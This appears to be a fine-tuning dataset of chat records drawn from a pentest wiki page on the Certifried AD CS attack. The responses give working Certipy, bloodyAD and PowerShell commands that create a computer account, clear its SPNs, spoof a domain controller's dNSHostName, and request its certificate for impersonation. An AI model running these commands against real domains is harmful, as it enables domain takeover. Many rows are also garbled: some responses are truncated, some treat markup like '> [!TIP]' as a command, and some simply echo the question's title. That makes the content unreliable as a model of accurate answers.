"docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Certifried - Detecting unpatched targets during a pentest?"}, {"role": "assistant", "content": "Requesting a certificate based on the Machine (or User) template can indicate whether the patch has been applied or not. If the certificate object contains an SID (objectSid), then the patch has been applied.\n\n::: tabs\n\n=== UNIX-like\n\nThis check can be conducted using Certipy (Python).\n\n``bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User'\n`\n\nIf Certipy doesn't print Certificate object SID is [...]` after obtaining the certificate, then the attack can be conducted.\n\n> [!WARNING]\n> Oliver underlined the fact that to fully mitigate the vulnerability, both the KDC and the CA server must be patched.\n\n=== Windows\n\n_At the time of writing this recipe (June 2022), no Windows alternative has been found._\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Certifried - Detecting unpatched targets during a pentest?", "response": "Requesting a certificate based on the Machine (or User) template can indicate whether the patch has been applied or not. If the certificate object contains an SID (objectSid), then the patch has been applied.\n\n::: tabs\n\n=== UNIX-like\n\nThis check can be conducted using Certipy (Python).\n\n``bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User'\n`\n\nIf Certipy doesn't print Certificate object SID is [...]` after obtaining the certificate, then the attack can be conducted.\n\n> [!WARNING]\n> Oliver underlined the fact that to fully mitigate the vulnerability, both the KDC and the CA server must be patched.\n\n=== Windows\n\n_At the time of writing this recipe (June 2022), no Windows alternative has been found._\n\n:::", "metadata": {"corpus_index": 150, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use certipy for certifried - detecting unpatched targets?"}, {"role": "assistant", "content": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use certipy for certifried - detecting unpatched targets?", "response": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User'", "metadata": {"corpus_index": 151, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certifried - Detecting unpatched targets"}, {"role": "assistant", "content": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certifried - Detecting unpatched targets", "response": "certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User'", "metadata": {"corpus_index": 151, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User'`?"}, {"role": "assistant", "content": "This command is used for certifried - detecting unpatched targets. Detecting unpatched targets"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'User'`?", "response": "This command is used for certifried - detecting unpatched targets. Detecting unpatched targets", "metadata": {"corpus_index": 151, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Certifried - Creating a computer account?"}, {"role": "assistant", "content": "The first step of the attack consists in creating a computer account (machineaccountquota.md, #create-a-computer-account), or have the write permission to the dNSHostName and servicePrincipalName attributes of another."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Certifried - Creating a computer account?", "response": "The first step of the attack consists in creating a computer account (machineaccountquota.md, #create-a-computer-account), or have the write permission to the dNSHostName and servicePrincipalName attributes of another.", "metadata": {"corpus_index": 152, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certifried - Creating a computer account?"}, {"role": "assistant", "content": "The first step of the attack consists in creating a computer account (machineaccountquota.md, #create-a-computer-account), or have the write permission to the dNSHostName and servicePrincipalName attributes of another."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certifried - Creating a computer account?", "response": "The first step of the attack consists in creating a computer account (machineaccountquota.md, #create-a-computer-account), or have the write permission to the dNSHostName and servicePrincipalName attributes of another.", "metadata": {"corpus_index": 152, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Certifried - dNSHostName and servicePrincipalName modification?"}, {"role": "assistant", "content": "The second step is conducted by removing the SPNs that reflect the dNSHostName value, and then modifying the dNSHostName to the name of the computer account to impersonate.\n\n::: tabs\n\n=== UNIX-like\n\nThe bloodyAD (Python) tool can be used on UNIX-like systems to operated these changes.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Certifried - dNSHostName and servicePrincipalName modification?", "response": "The second step is conducted by removing the SPNs that reflect the dNSHostName value, and then modifying the dNSHostName to the name of the computer account to impersonate.\n\n::: tabs\n\n=== UNIX-like\n\nThe bloodyAD (Python) tool can be used on UNIX-like systems to operated these changes.\n\n```bash", "metadata": {"corpus_index": 153, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Certifried - dNSHostName and servicePrincipalName modification"}, {"role": "assistant", "content": "The second step is conducted by removing the SPNs that reflect the dNSHostName value, and then modifying the dNSHostName to the name of the computer account to impersonate.\n\n::: tabs\n\n=== UNIX-like\n\nThe bloodyAD (Python) tool can be used on UNIX-like systems to operated these changes.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Certifried - dNSHostName and servicePrincipalName modification", "response": "The second step is conducted by removing the SPNs that reflect the dNSHostName value, and then modifying the dNSHostName to the name of the computer account to impersonate.\n\n::: tabs\n\n=== UNIX-like\n\nThe bloodyAD (Python) tool can be used on UNIX-like systems to operated these changes.\n\n```bash", "metadata": {"corpus_index": 153, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Clearing the SPNs"}, {"role": "assistant", "content": "bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP set object $COMPUTER_NAME serviceprincipalname"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Clearing the SPNs", "response": "bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP set object $COMPUTER_NAME serviceprincipalname", "metadata": {"corpus_index": 154, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Clearing the SPNs"}, {"role": "assistant", "content": "bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP set object $COMPUTER_NAME serviceprincipalname"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Clearing the SPNs", "response": "bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP set object $COMPUTER_NAME serviceprincipalname", "metadata": {"corpus_index": 154, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Setting the dNSHostName value to the name of a computer account to impersonate?"}, {"role": "assistant", "content": "bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP set object $COMPUTER_NAME dnsHostName -v '$DC_NAME.$DOMAIN'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Setting the dNSHostName value to the name of a computer account to impersonate?", "response": "bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP set object $COMPUTER_NAME dnsHostName -v '$DC_NAME.$DOMAIN'", "metadata": {"corpus_index": 155, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Setting the dNSHostName value to the name of a computer account to impersonate?"}, {"role": "assistant", "content": "bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP set object $COMPUTER_NAME dnsHostName -v '$DC_NAME.$DOMAIN'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Setting the dNSHostName value to the name of a computer account to impersonate?", "response": "bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP set object $COMPUTER_NAME dnsHostName -v '$DC_NAME.$DOMAIN'", "metadata": {"corpus_index": 155, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Verifying the dNSHostName value and SPN entries work?"}, {"role": "assistant", "content": "bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP get object $COMPUTER_NAME --attr dnsHostName,serviceprincipalname\n``\n\nCertipy tool can also add a machine account and amend the dNSHostName property with the following command liner.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Verifying the dNSHostName value and SPN entries work?", "response": "bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP get object $COMPUTER_NAME --attr dnsHostName,serviceprincipalname\n``\n\nCertipy tool can also add a machine account and amend the dNSHostName property with the following command liner.\n\n``bash", "metadata": {"corpus_index": 156, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Verifying the dNSHostName value and SPN entries"}, {"role": "assistant", "content": "bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP get object $COMPUTER_NAME --attr dnsHostName,serviceprincipalname\n``\n\nCertipy tool can also add a machine account and amend the dNSHostName property with the following command liner.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Verifying the dNSHostName value and SPN entries", "response": "bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP get object $COMPUTER_NAME --attr dnsHostName,serviceprincipalname\n``\n\nCertipy tool can also add a machine account and amend the dNSHostName property with the following command liner.\n\n``bash", "metadata": {"corpus_index": 156, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Verifying the dNSHostName value and SPN entries?"}, {"role": "assistant", "content": "[Certipy](https://github.com/ly4k/Certipy) tool can also add a machine account and amend the `dNSHostName` property with the following command liner."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Verifying the dNSHostName value and SPN entries?", "response": "[Certipy](https://github.com/ly4k/Certipy) tool can also add a machine account and amend the `dNSHostName` property with the following command liner.", "metadata": {"corpus_index": 157, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `[Certipy](https://github.com/ly4k/Certipy) tool can also add a machine account and amend the `dNSHostName` property with the following command liner.`?"}, {"role": "assistant", "content": "This command is used for verifying the dnshostname value and spn entries. Verifying the dNSHostName value and SPN entries"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `[Certipy](https://github.com/ly4k/Certipy) tool can also add a machine account and amend the `dNSHostName` property with the following command liner.`?", "response": "This command is used for verifying the dnshostname value and spn entries. Verifying the dNSHostName value and SPN entries", "metadata": {"corpus_index": 157, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Adding a computer account and setting the dNSHostName to impersonate"}, {"role": "assistant", "content": "certipy account create -u \"$USER\"@\"$DOMAIN\" -p \"$PASSWORD\" -user \"$COMPUTER_NAME\" -pass \"$COMPUTER_PASS\" -dns \"$DC_NAME.$DOMAIN\"\n\n``\n\n> [!TIP]\n> The Domain Components (DC) are the different parts of the domain name (DC=domain,DC=local for domain.local, or DC=sub,DC=domain,DC=local for sub.domain.local).\n\n=== Windows\n\nThe Active Directory RSAT tools can be used on Windows systems to operate these changes.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Adding a computer account and setting the dNSHostName to impersonate", "response": "certipy account create -u \"$USER\"@\"$DOMAIN\" -p \"$PASSWORD\" -user \"$COMPUTER_NAME\" -pass \"$COMPUTER_PASS\" -dns \"$DC_NAME.$DOMAIN\"\n\n``\n\n> [!TIP]\n> The Domain Components (DC) are the different parts of the domain name (DC=domain,DC=local for domain.local, or DC=sub,DC=domain,DC=local for sub.domain.local).\n\n=== Windows\n\nThe Active Directory RSAT tools can be used on Windows systems to operate these changes.\n\n``bash", "metadata": {"corpus_index": 158, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Adding a computer account and setting the dNSHostName to impersonate"}, {"role": "assistant", "content": "certipy account create -u \"$USER\"@\"$DOMAIN\" -p \"$PASSWORD\" -user \"$COMPUTER_NAME\" -pass \"$COMPUTER_PASS\" -dns \"$DC_NAME.$DOMAIN\"\n\n``\n\n> [!TIP]\n> The Domain Components (DC) are the different parts of the domain name (DC=domain,DC=local for domain.local, or DC=sub,DC=domain,DC=local for sub.domain.local).\n\n=== Windows\n\nThe Active Directory RSAT tools can be used on Windows systems to operate these changes.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Adding a computer account and setting the dNSHostName to impersonate", "response": "certipy account create -u \"$USER\"@\"$DOMAIN\" -p \"$PASSWORD\" -user \"$COMPUTER_NAME\" -pass \"$COMPUTER_PASS\" -dns \"$DC_NAME.$DOMAIN\"\n\n``\n\n> [!TIP]\n> The Domain Components (DC) are the different parts of the domain name (DC=domain,DC=local for domain.local, or DC=sub,DC=domain,DC=local for sub.domain.local).\n\n=== Windows\n\nThe Active Directory RSAT tools can be used on Windows systems to operate these changes.\n\n``bash", "metadata": {"corpus_index": 158, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Adding a computer account and setting the dNSHostName to impersonate?"}, {"role": "assistant", "content": "> [!TIP]\n> The Domain Components (DC) are the different parts of the domain name (`DC=domain,DC=local` for `domain.local`, or `DC=sub,DC=domain,DC=local` for `sub.domain.local`).\n\n=== Windows\n\nThe [Active Directory RSAT](https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps) tools can be used on Windows systems to operate these changes."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Adding a computer account and setting the dNSHostName to impersonate?", "response": "> [!TIP]\n> The Domain Components (DC) are the different parts of the domain name (`DC=domain,DC=local` for `domain.local`, or `DC=sub,DC=domain,DC=local` for `sub.domain.local`).\n\n=== Windows\n\nThe [Active Directory RSAT](https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps) tools can be used on Windows systems to operate these changes.", "metadata": {"corpus_index": 159, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!TIP]`?"}, {"role": "assistant", "content": "This command is used for adding a computer account and setting the dnshostname to impersonate. Adding a computer account and setting the dNSHostName to impersonate"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!TIP]`?", "response": "This command is used for adding a computer account and setting the dnshostname to impersonate. Adding a computer account and setting the dNSHostName to impersonate", "metadata": {"corpus_index": 159, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Clearing the SPNs in the context of penetration testing"}, {"role": "assistant", "content": "Set-ADComputer $COMPUTER_NAME -ServicePrincipalName @{}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Clearing the SPNs in the context of penetration testing", "response": "Set-ADComputer $COMPUTER_NAME -ServicePrincipalName @{}", "metadata": {"corpus_index": 160, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Clearing the SPNs"}, {"role": "assistant", "content": "Set-ADComputer $COMPUTER_NAME -ServicePrincipalName @{}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Clearing the SPNs", "response": "Set-ADComputer $COMPUTER_NAME -ServicePrincipalName @{}", "metadata": {"corpus_index": 160, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Setting the dNSHostName value to the name of a computer account to impersonate in the context of penetration testing"}, {"role": "assistant", "content": "Set-ADComputer $COMPUTER_NAME -DnsHostName $DC_NAME.$DOMAIN_FQDN"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Setting the dNSHostName value to the name of a computer account to impersonate in the context of penetration testing", "response": "Set-ADComputer $COMPUTER_NAME -DnsHostName $DC_NAME.$DOMAIN_FQDN", "metadata": {"corpus_index": 161, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Setting the dNSHostName value to the name of a computer account to impersonate"}, {"role": "assistant", "content": "Set-ADComputer $COMPUTER_NAME -DnsHostName $DC_NAME.$DOMAIN_FQDN"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Setting the dNSHostName value to the name of a computer account to impersonate", "response": "Set-ADComputer $COMPUTER_NAME -DnsHostName $DC_NAME.$DOMAIN_FQDN", "metadata": {"corpus_index": 161, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Verifying the dNSHostName value and SPN entries"}, {"role": "assistant", "content": "Get-ADComputer $COMPUTER_NAME -properties dnshostname,serviceprincipalname\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Verifying the dNSHostName value and SPN entries", "response": "Get-ADComputer $COMPUTER_NAME -properties dnshostname,serviceprincipalname\n```\n\n:::", "metadata": {"corpus_index": 162, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Verifying the dNSHostName value and SPN entries"}, {"role": "assistant", "content": "Get-ADComputer $COMPUTER_NAME -properties dnshostname,serviceprincipalname\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Verifying the dNSHostName value and SPN entries", "response": "Get-ADComputer $COMPUTER_NAME -properties dnshostname,serviceprincipalname\n```\n\n:::", "metadata": {"corpus_index": 162, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certifried.md", "page_title": "Certifried", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Certifried - Obtaining a certificate?"}, {"role": "assistant", "content": "The third and last step consists in getting the certificate of the targeted machine account ($DC_NAME in the previous command examples).\n\n::: tabs\n\n=== UNIX-like\n\nCertipy (Python) can be used to request the certificate from UNIX-like systems.\n\n``bash\ncertipy req -u 'compter$'@\"$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'Machine'\n\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nCertify (C#) can be used to request the certificate from Windows systems.\n\n`powershell\nCertify.exe request /ca:\"domain\\ca\" /template:\"Machine\"\n``\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Certifried - Obtaining a certificate?", "response": "The third and last step consists in getting the certificate of the targeted machine account ($DC_NAME in the previous command examples).\n\n::: tabs\n\n=== UNIX-like\n\nCertipy (Python) can be used to request the certificate from UNIX-like systems.\n\n``bash\ncertipy req -u 'compter$'@\"$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target 